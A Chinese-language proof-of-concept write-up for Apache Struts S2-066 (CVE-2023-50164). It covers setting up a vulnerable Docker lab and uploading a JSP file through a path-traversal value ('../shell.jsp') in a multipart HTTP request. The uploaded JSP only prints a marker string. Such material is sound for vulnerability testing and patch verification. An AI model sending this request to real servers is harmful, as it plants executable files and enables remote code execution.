mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 03:44:10 +00:00
119 lines
4.1 KiB
Markdown
119 lines
4.1 KiB
Markdown
# Apache Struts S2-066 远程代码执行漏洞 CVE-2023-50164
|
||
|
||
## 漏洞描述
|
||
|
||
Apache Struts2 是一个开源的 Java Web 应用程序开发框架,旨在帮助开发人员构建灵活、可维护和可扩展的企业级 Web 应用程序。
|
||
|
||
该漏洞存在于 Apache Struts 中,是一个代码执行漏洞。攻击者可以操纵文件上传参数来执行路径遍历,进而上传可用于执行远程代码执行的恶意文件。
|
||
|
||
参考链接:
|
||
|
||
- [Apache Struts2 文件上传分析(S2-066)](https://y4tacker.github.io/2023/12/09/year/2023/12/Apache-Struts2-%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%86%E6%9E%90-S2-066/ )
|
||
- https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
Struts 2.0.0-2.3.37
|
||
Strust 2.5.0-2.5.32
|
||
Strust 6.0.0-6.3.0
|
||
```
|
||
|
||
## 环境搭建
|
||
|
||
通过项目 [CVE-2023-50164-ApacheStruts2-Docker](https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker) 搭建一个 Struts 6.3.0 漏洞环境:
|
||
|
||
```
|
||
git clone https://github.com/Trackflaw/CVE-2023-50164-ApacheStruts2-Docker.git
|
||
cd CVE-2023-50164-ApacheStruts2-Docker
|
||
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2023-50164 .
|
||
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2023-50164 cve-2023-50164
|
||
```
|
||
|
||
可更新 maven 源加速构建,在 Dockerfile 同级目录创建一个自定义的 settings.xml:
|
||
|
||
```
|
||
<settings xmlns="http://maven.apache.org/SETTINGS/1.0.0"
|
||
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||
xsi:schemaLocation="http://maven.apache.org/SETTINGS/1.0.0
|
||
http://maven.apache.org/xsd/settings-1.0.0.xsd">
|
||
<mirrors>
|
||
<mirror>
|
||
<id>aliyun-maven</id>
|
||
<mirrorOf>central</mirrorOf>
|
||
<name>Aliyun Maven</name>
|
||
<url>https://maven.aliyun.com/repository/central</url>
|
||
</mirror>
|
||
</mirrors>
|
||
</settings>
|
||
```
|
||
|
||
在 Dockerfile 中新增一行,将自定义的 `settings.xml` 复制到 Maven 的配置目录中,替换默认文件:
|
||
|
||
```
|
||
COPY settings.xml /root/.m2/settings.xml
|
||
```
|
||
|
||
重新执行 `docker build` 与 `docker run` 即可。
|
||
|
||
通过 `curl` 验证服务是否启动:
|
||
|
||
```
|
||
curl http://your-ip:8080/upload.action
|
||
```
|
||
|
||
或访问 `http://your-ip:8080/upload.action` 查看上传页面。
|
||
|
||
|
||
|
||
## 漏洞复现
|
||
|
||
在该环境中做了文件后缀限制,只能上传图片,不允许直接上传 `.jsp` 文件:
|
||
|
||
|
||
|
||
根据 HashMap 中存储的调用顺序构造 payload:
|
||
|
||
```
|
||
POST /upload.action HTTP/1.1
|
||
Host: your-ip:8080
|
||
Content-Length: 319
|
||
Cache-Control: max-age=0
|
||
Origin: http://your-ip:8080
|
||
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfZRVTHWYyGlXGAeY
|
||
Upgrade-Insecure-Requests: 1
|
||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
|
||
Referer: http://your-ip:8080/upload.action
|
||
Accept-Encoding: gzip, deflate, br
|
||
Accept-Language: en
|
||
Cookie: JSESSIONID=ED2FB48CE518AF954B3EA4F97AC1FF17
|
||
Connection: keep-alive
|
||
|
||
------WebKitFormBoundaryfZRVTHWYyGlXGAeY
|
||
Content-Disposition: form-data; name="Upload"; filename="test.png"
|
||
Content-Type: image/png
|
||
|
||
<%= "awesome_poc" %>
|
||
|
||
------WebKitFormBoundaryfZRVTHWYyGlXGAeY
|
||
Content-Disposition: form-data; name="uploadFileName";
|
||
|
||
../shell.jsp
|
||
------WebKitFormBoundaryfZRVTHWYyGlXGAeY--
|
||
```
|
||
|
||
|
||
|
||
访问上传文件:
|
||
|
||
```
|
||
http://your-ip:8080/shell.jsp
|
||
```
|
||
|
||
|
||
|
||
## 漏洞修复
|
||
|
||
根据 `漏洞影响` 中的信息,排查并升级到 `安全版本`,或直接访问参考链接获取官方更新指南,[https://struts.apache.org/download.cgi](https://struts.apache.org/download.cgi)。
|